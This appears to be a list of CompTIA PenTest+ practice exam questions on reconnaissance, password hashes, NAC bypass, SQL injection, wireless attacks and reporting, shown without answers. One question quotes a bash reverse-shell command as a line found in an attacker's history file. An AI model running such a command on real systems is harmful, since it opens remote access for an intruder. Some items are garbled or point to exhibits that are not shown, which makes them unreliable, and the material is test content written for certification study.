PT0-001 CompTIA PenTest+ Exam Questions and Answers

When conducting reconnaissance against a target, which of the following should be used to avoid directory communicating with the target?

If a security consultant comes across a password hash that resembles the following

b117 525b3454 7Oc29ca3dBaeOb556ba8

Which of the following formats is the correct hash type?

A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

A penetration tester is performing an annual security assessment for a repeat client The tester finds indicators of previous compromise Which of the following would be the most logical steps to follow NEXT?

During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full administrator privileges on a number of target systems Efforts to crack the hash and recover the plaintext password have been unsuccessful Which of the following would be the BEST target for continued exploitation efforts?

An SMB server was discovered on the network, and the penetration tester wants to see if the server it vulnerable. Which of the following is a relevant approach to test this?

Which of the following BEST describes the difference between a red team engagement and a penetration test?

An internal network penetration test is conducted against a network that is protected by an unknown NAC system In an effort to bypass the NAC restrictions the penetration tester spoofs the MAC address and hostname of an authorized system Which of the following devices if impersonated would be MOST likely to provide the tester with network access?

After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?

Which of the following would be BEST for performing passive reconnaissance on a target's external domain?

A vulnerability scan is run against a domain hosing a banking application that accepts connections over MTTPS and HTTP protocols Given the following results:

• SSU3 supported

• HSTS not enforced

• Application uses weak ciphers

• Vulnerable to clickjacking

Which of the following should be ranked with the HIGHEST risk?

Given the following script:

Which of the following BEST describes the purpose of this script?

A penetration tester is preparing to conduct API testing Which of the following would be MOST helpful in preparing for this engagement?

Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical

security assessment an example of?

Given the following Python script:

#1/usr/bin/python

import socket as skt

for port in range (1,1024):

try:

sox=skt.socket(skt.AF.INET,skt.SOCK_STREAM)

sox.settimeout(1000)

sox.connect ((‘127.0.0.1’, port))

print ‘%d:OPEN’ % (port)

sox.close

except: continue

Which of the following is where the output will go?

Given the following Python code:

a = 'abcdefghijklmnop'

a[::2]

Which of the following will result?

After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?

Which of the following are MOST important when planning for an engagement? (Select TWO).

A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:

• Code review

• Updates to firewall setting

A penetration tester needs to use Nmap to scan a host with a very low speed so the WAF or IPS/IDS is not triggered. Which of the following command-line parameters should be added to the Nmap command?

Click the exhibit button.

Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In

which of the following areas of the report should the penetration tester put this?

Which of the following types of physical security attacks does a mantrap mitigate-?

During a physical security review, a detailed penetration testing report was obtained, which was issued to a

security analyst and then discarded in the trash. The report contains validated critical risk exposures. Which of

the following processes would BEST protect this information from being disclosed in the future?

A penetration tester is performing a code review against a web application Given the following URL and source code:

Which of the following vulnerabilities is present in the code above?

A penetration tester has been hired to perform a penetration test for an organization. Which of the following is

indicative of an error-based SQL injection attack?

A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?

While presenting the results of a penetration test to a client's executive team, the Chief Information Security Officer (CISO) asks for remediation advice for a shared local administrator finding. The client is geographically dispersed, and centralized management is a key concern. Which of the following is the BEST remediation to suggest?

A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used

in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

A client has scheduled a wireless penetration test. Which of the following describes the scoping target

information MOST likely needed before testing can begin?

While conducting information gathering, a penetration tester is trying to identify Windows hosts. Which of the following characteristics would be BEST to use for fingerprinting?

The following line was found in an exploited machine's history file. An attacker ran the following command:

bash -i >& /dev/tcp/192.168.0.1/80 0> &1

Which of the following describes what the command does?

A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy

Request

POST /Bank/Tax/RTSdocuments/ HTTP 1.1

Host: test.com

Accept: text/html; application/xhtml+xml

Referrer: https://www.test.com/Bank/Tax/RTSdocuments/

Cookie: PHPSESSIONID: ;

Content-Type: application/form-data;

Response

403 Forbidden

Error:

Insufficient Privileges to view the data.

Displaying 1-10 of 105 records

Which of the following types of vulnerabilities is being exploited?

A penetration tester is required to report installed shells on compromised systems. Which of the following is the reason?

A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

A penetration tester has gained physical access to a facility and connected directly into the internal network.

The penetration tester now wants to pivot into the server VLAN. Which of the following would accomplish this?

Defining exactly what is to be tested and the results to be generated from the test will help prevent?

A healthcare organization must abide by local regulations to protect and attest to the protection of personal

health information of covered individuals. Which of the following conditions should a penetration tester

specifically test for when performing an assessment? (Select TWO).

A client asks a penetration tester to add more addresses to a test currently in progress. Which of the following would defined the target list?

A penetration tester is reviewing a Zigbee Implementation for security issues. Which of the following device types is the tester MOST likely testing?